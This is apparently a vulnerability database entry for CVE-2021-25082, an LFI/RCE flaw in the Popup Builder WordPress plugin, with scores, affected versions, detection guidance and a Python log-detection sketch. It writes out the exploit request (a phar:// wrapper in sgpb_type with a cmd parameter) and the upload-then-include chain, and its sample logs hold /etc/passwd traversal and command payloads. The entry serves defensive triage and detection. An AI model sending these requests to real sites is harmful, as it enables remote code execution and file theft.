CVE-2021-25082
Published 2022-02-21
Priority: P2 · 76 · high · 8.8 (CVSS 3.1)
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 5.37% (91.6th percentile)
The Popup Builder WordPress plugin before 4.0.7 does not validate and sanitise the sgpb_type parameter before using it in a require statement, leading to a Local File Inclusion issue. Furthermore, since the beginning of the string can be controlled, the issue can lead to an RCE vulnerability via wrappers such as PHAR.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sygnoos | popup_builder | < 4.0.7 | 4.0.7 |
Detection & IOCs (extracted from sources)
- Request pattern (command): `/?sgpb_type=phar://wp-content/uploads/{{upload_year}}/{{upload_month}}/malicious.zip/&cmd=echo%20{{marker}}`
- Look for GET requests to the WordPress root with the 'sgpb_type' parameter containing a 'phar://' wrapper, which is the exploitation vector for this LFI/RCE vulnerability.
- Monitor for authenticated file uploads of ZIP archives to /wp-admin/async-upload.php followed shortly by requests using the 'sgpb_type' parameter that reference the uploaded file path via the phar:// wrapper.
- Detect the 'sgpb_type' parameter in HTTP requests containing path traversal or wrapper strings (e.g., 'phar://', 'php://') as indicators of exploitation attempts.
- Check for the cookie 'wordpress_logged_in' in conjunction with the above upload and exploitation requests, as the attack requires authenticated access.
- Exploitation requires the attacker to be authenticated (subscriber-level or higher) to upload the malicious ZIP file via the WordPress media uploader before triggering the PHAR wrapper via sgpb_type.
- The vulnerability can be escalated from LFI to RCE only when the attacker can upload a PHAR-compatible archive (e.g., ZIP) to the server, which is possible via the WordPress media upload functionality for authenticated users.
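A detection sketch for the patterns listed above (an added example, not part of this record or of any vendor rule): it parses combined-format web server log lines, flags sgpb_type values that begin with a stream wrapper or contain path traversal, and marks those that follow a POST to /wp-admin/async-upload.php from the same client. The log lines, the client addresses and the ten-minute correlation window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in combined log format (not real traffic); the first
# two model the upload-then-include chain, the third a traversal attempt.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Feb/2022:10:14:02 +0000] "POST /wp-admin/async-upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Feb/2022:10:14:09 +0000] "GET /?sgpb_type=phar://wp-content/uploads/2022/02/evil.zip/&cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Feb/2022:10:15:30 +0000] "GET /?sgpb_type=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0 "-" "curl/7.81"
192.0.2.9 - - [21/Feb/2022:10:16:00 +0000] "GET /?sgpb_type=Popup HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+)[^"]*"')
WRAPPER_RE = re.compile(r'^(phar|php|data|zip|file)://', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
UPLOAD_WINDOW = timedelta(minutes=10)   # assumed correlation window

def classify_sgpb_type(target):
    """Label a suspicious sgpb_type value, or return None if it looks benign."""
    for raw in parse_qs(urlsplit(target).query).get("sgpb_type", []):
        value = unquote(raw)            # parse_qs decoded once; catch double-encoding
        if WRAPPER_RE.match(value):
            return "stream_wrapper"     # phar://, php://, ... at the start of the value
        if TRAVERSAL_RE.search(value):
            return "path_traversal"
    return None

def detect(log_text):
    """Return findings; after_upload marks an include shortly after a media upload
    from the same client, the chain the advisory describes."""
    findings, last_upload = [], {}      # last_upload: ip -> time of last async-upload POST
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target = m.group("ip"), m.group("method"), m.group("target")
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and target.startswith("/wp-admin/async-upload.php"):
            last_upload[ip] = ts
            continue
        label = classify_sgpb_type(target)
        if label:
            up = last_upload.get(ip)
            findings.append({"ip": ip, "label": label,
                             "after_upload": up is not None and ts - up <= UPLOAD_WINDOW})
    return findings
```

Running `detect(SAMPLE_LOG)` yields one `stream_wrapper` finding chained to an upload and one unchained `path_traversal` finding; the benign `sgpb_type=Popup` request produces nothing.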
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| vulncheck | | 8.8 | HIGH | |
GHSA
GHSA-rgh6-hx6g-h7q7 · ghsa_unreviewed · 2022-02-22 · CVE-2021-25082 [HIGH] · CWE-22
Title: The Popup Builder WordPress plugin before 4
Description: same as above.
VulnCheck
sygnoos popup_builder Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') · vulncheck · 2021 · CVSS 8.8 · CVE-2021-25082 [HIGH]
Description: same as above.
Affected: sygnoos popup_builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-builder/popup-builder-406-local-file-inclusion-and-phar-deserialization
No detection rules found.
Nuclei
WordPress Popup Builder < 4.0.7 - Remote Code Execution · nuclei · CVSS 8.8 · CVE-2021-25082 [HIGH]
Popup Builder WordPress plugin before 4.0.7 contains a local file inclusion caused by an unsanitized 'sgpb_type' parameter in a require statement, letting attackers include arbitrary local files or execute code via wrappers like PHAR; the exploit requires the attacker to control the 'sgpb_type' parameter.
Template:
```yaml
id: CVE-2021-25082

info:
  name: WordPress Popup Builder < 4.0.7 - Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
    Popup Builder WordPress plugin before 4.0.7 contains a local file inclusion caused by unsanitized 'sgpb_type' parameter in require statement, letting attackers include arbitrary local files or execute code via wrappers like PHAR, exploit requires attacker to control 'sgpb_type' parameter.
  impact: |
    At
```
No writeups or analysis indexed.